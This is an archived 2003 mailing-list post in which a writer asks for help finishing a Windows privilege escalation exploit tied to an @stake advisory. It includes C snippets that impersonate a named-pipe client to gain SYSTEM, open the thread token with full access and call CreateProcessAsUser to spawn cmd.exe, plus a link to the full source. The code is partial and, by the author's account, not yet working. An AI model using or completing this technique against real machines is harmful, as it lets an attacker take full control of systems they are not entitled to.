Hello, I'm attempting to finish up my exploit for the
@stake advisory, i've hit quite a snag when i found out
that calling a new process does not inherit the privileges
of the named pipe. (I must have been thinking of fork() or
something heh). So I can impersonate SYSTEM, but I can not
create a new process with these nice privileges. Here is
where i am at:
ConnectNamedPipe() <-- yada yada wait for connection
if (!ImpersonateNamedPipeClient (hPipe)) // impersonate
the pipe so we now are SYSTEM.
{
printf ("Failed to impersonate the named pipe.\n");
CloseHandle(hPipe);
return 5;
}
// found this on msdn, i'm trying to get a token with full
access, then call CreateProcessAsUser();
if (!OpenThreadToken(GetCurrentThread(),
TOKEN_ALL_ACCESS, TRUE, &hToken )) {
if (hToken != INVALID_HANDLE_VALUE) {
CloseHandle(hToken);
printf("damn: %u\n", GetLastError());
}
}
MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm
kinda shady on, looks like i'm just mapping the id to the
SYSTEM name? when i call GetUserName i get garble after
the OpenThreadToken unless i call MapGenericMask...
CreateProcessAsUser(hToken, "cmd.exe",
NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi);
CloseHandle(hPipe);
now i call createprocessasuser, using the token from
openthreadtoken. In the debugger, it tries to execute cmd,
but but i get nothing back... if anyone wants to see my
code it's at http://sh0dan.org/files/tac0tac0.c... Thanks
this is starting to bug me :),
-wire
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>
This archive was generated by hypermail 2b30 : Mon Jul 14 2003 - 13:00:51 PDT